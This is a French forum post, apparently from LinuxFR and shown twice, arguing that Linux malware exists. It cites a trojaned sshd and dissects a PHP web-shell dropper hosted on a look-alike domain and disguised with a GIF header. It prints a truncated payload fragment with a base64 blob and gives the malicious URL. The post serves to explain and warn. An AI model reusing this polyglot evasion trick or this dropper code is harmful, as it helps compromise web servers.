Pour le sondage: Il y a 5mn.
Tout le monde imagine un petit virus "à la windows" et rigole en disant que ça n'existe pas sous linux, mais il en existe d'autres types.
Premier cas: on en parlait y'a pas 5mn, c'était même en main page de linuxfr avec du sshd vérolé: d'où il vient, et comment il se promène? Il y a de grandes chances que ce soit de manière automatique. Vous en voulez d'autres? J'en ai là: http://picasa.com.playteck.net/indeks.php
On note tout d'abord la présence d'esprit du pirate en utilisant un nom de domaine qui ressemble à un nom connu. Le pirate utilise une deuxième méthode d'évasion pour la détection:
Si vous d/l le fichier php et que vous faites un file, ça vous dit: $ file indeks.php
indeks.php: GIF image data, version 89a, 16129 x 16129
alors que quand on regarde dedans on retrouve du code php… $ cat indeks.php
GIF89a?????ÿÿÿ!ù????,???????D?;?<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
$shell_data = "aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0 (snip...)
Un petit dropper pas trop méchant, je vous épargne les véritables attaques que je vois. Sauf que ce genre de trucs:
-ça se promène tout seul
-ça se duplique tout seul
-ça infecte du linux
Et ça, ça ressemble furieusement à la définition d'un virus sous linux.
# Il y en a partout!
Posté par octane . En réponse au sondage La dernière fois que j'ai vu un virus/vers concernant Linux. Évalué à 10.
Pour le sondage: Il y a 5mn.
Tout le monde imagine un petit virus "à la windows" et rigole en disant que ça n'existe pas sous linux, mais il en existe d'autres types.
Premier cas: on en parlait y'a pas 5mn, c'était même en main page de linuxfr avec du sshd vérolé: d'où il vient, et comment il se promène? Il y a de grandes chances que ce soit de manière automatique. Vous en voulez d'autres? J'en ai là:
http://picasa.com.playteck.net/indeks.php
On note tout d'abord la présence d'esprit du pirate en utilisant un nom de domaine qui ressemble à un nom connu. Le pirate utilise une deuxième méthode d'évasion pour la détection:
Si vous d/l le fichier php et que vous faites un file, ça vous dit:
$ file indeks.php
indeks.php: GIF image data, version 89a, 16129 x 16129
alors que quand on regarde dedans on retrouve du code php…
$ cat indeks.php
GIF89a?????ÿÿÿ!ù????,???????D?;?<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
$shell_data = "aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0 (snip...)
Un petit dropper pas trop méchant, je vous épargne les véritables attaques que je vois. Sauf que ce genre de trucs:
-ça se promène tout seul
-ça se duplique tout seul
-ça infecte du linux
Et ça, ça ressemble furieusement à la définition d'un virus sous linux.